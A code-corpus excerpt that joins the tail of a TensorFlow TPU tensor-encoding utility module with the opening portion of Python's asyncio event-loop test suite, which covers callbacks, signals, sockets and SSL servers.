def _type_spec(self):
return self._spec
tensor_conversion_registry.register_tensor_conversion_function(
TPUEncodedF32, lambda value, *unused_args, **unused_kwargs: value.encoded)
def num_divisible(v, m):
return sum([1 for x in v if x % m == 0])
def tpu_encode(ts):
"""Encodes a nest of Tensors in a suitable way for TPUs.
TPUs do not support tf.uint8, tf.uint16 and other data types. Furthermore,
the speed of transfer and device reshapes depend on the shape of the data.
This function tries to optimize the data encoding for a number of use cases.
Should be used on CPU before sending data to TPU and in conjunction with
`tpu_decode` after the data is transferred.
Args:
ts: A tf.nest of Tensors.
Returns:
A tf.nest of encoded Tensors.
"""
def visit(t):
num_elements = t.shape.num_elements()
# We need a multiple of 128 elements: encoding reduces the number of
# elements by a factor 4 (packing uint8s into uint32s), and first thing
# decode does is to reshape with a 32 minor-most dimension.
if (t.dtype == tf.uint8 and num_elements is not None and
num_elements % 128 == 0):
# For details of these transformations, see b/137182262.
x = tf.xla.experimental.compile(
lambda x: tf.transpose(x, list(range(1, t.shape.rank)) + [0]), [t])[0]
x = tf.reshape(x, [-1, 4])
x = tf.bitcast(x, tf.uint32)
x = tf.reshape(x, [-1])
return TPUEncodedUInt8(x, t.shape)
elif t.dtype == tf.uint8:
logging.warning('Inefficient uint8 transfer with shape: %s', t.shape)
return tf.cast(t, tf.bfloat16)
elif t.dtype == tf.uint16:
return tf.cast(t, tf.int32)
elif (t.dtype == tf.float32 and t.shape.rank > 1 and not
(num_divisible(t.shape.dims, 128) >= 1 and
num_divisible(t.shape.dims, 8) >= 2)):
x = tf.reshape(t, [-1])
return TPUEncodedF32(x, t.shape)
else:
return t
return tf.nest.map_structure(visit, ts)
def tpu_decode(ts, structure=None):
"""Decodes a nest of Tensors encoded with tpu_encode.
Args:
ts: A nest of Tensors or TPUEncodedUInt8 composite tensors.
structure: If not None, a nest of Tensors or TPUEncodedUInt8 composite
tensors (possibly within PerReplica's) that are only used to recreate the
structure of `ts` which then should be a list without composite tensors.
Returns:
A nest of decoded tensors packed as `structure` if available, otherwise
packed as `ts`.
"""
def visit(t, s):
s = s.values[0] if isinstance(s, values_lib.PerReplica) else s
if isinstance(s, TPUEncodedUInt8):
x = t.encoded if isinstance(t, TPUEncodedUInt8) else t
x = tf.reshape(x, [-1, 32, 1])
x = tf.broadcast_to(x, x.shape[:-1] + [4])
x = tf.reshape(x, [-1, 128])
x = tf.bitwise.bitwise_and(x, [0xFF, 0xFF00, 0xFF0000, 0xFF000000] * 32)
x = tf.bitwise.right_shift(x, [0, 8, 16, 24] * 32)
rank = s.original_shape.rank
perm = [rank - 1] + list(range(rank - 1))
inverted_shape = np.array(s.original_shape)[np.argsort(perm)]
x = tf.reshape(x, inverted_shape)
x = tf.transpose(x, perm)
return x
elif isinstance(s, TPUEncodedF32):
x = t.encoded if isinstance(t, TPUEncodedF32) else t
x = tf.reshape(x, s.original_shape)
return x
else:
return t
return tf.nest.map_structure(visit, ts, structure or ts)
def split_structure(structure, prefix_length, axis=0):
"""Splits in two a tf.nest structure of tensors along the first axis."""
flattened = tf.nest.flatten(structure)
split = [tf.split(x, [prefix_length, tf.shape(x)[axis] - prefix_length],
axis=axis)
for x in flattened]
flattened_prefix = [pair[0] for pair in split]
flattened_suffix = [pair[1] for pair in split]
return (tf.nest.pack_sequence_as(structure, flattened_prefix),
tf.nest.pack_sequence_as(structure, flattened_suffix))
class nullcontext(object):
def __init__(self, *args, **kwds):
del args # unused
del kwds # unused
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def tensor_spec_from_gym_space(space, name):
"""Get a TensorSpec from a gym spec."""
if space.shape is not None:
return tf.TensorSpec(space.shape, space.dtype, name)
if not isinstance(space, gym.spaces.Tuple):
raise ValueError(
'Space \'{}\' is not a tuple: unknown shape.'.format(space))
num_elements = 0
for s in space:
if len(s.shape) != 1:
raise ValueError(
'Only 1 dimension subspaces are handled for tuple spaces: {}'.format(
space))
num_elements += s.shape[0]
return tf.TensorSpec((num_elements,), tf.float32, name)
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
with self.assertWarnsRegex(
RuntimeWarning,
r"coroutine \S+ was never awaited"
):
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
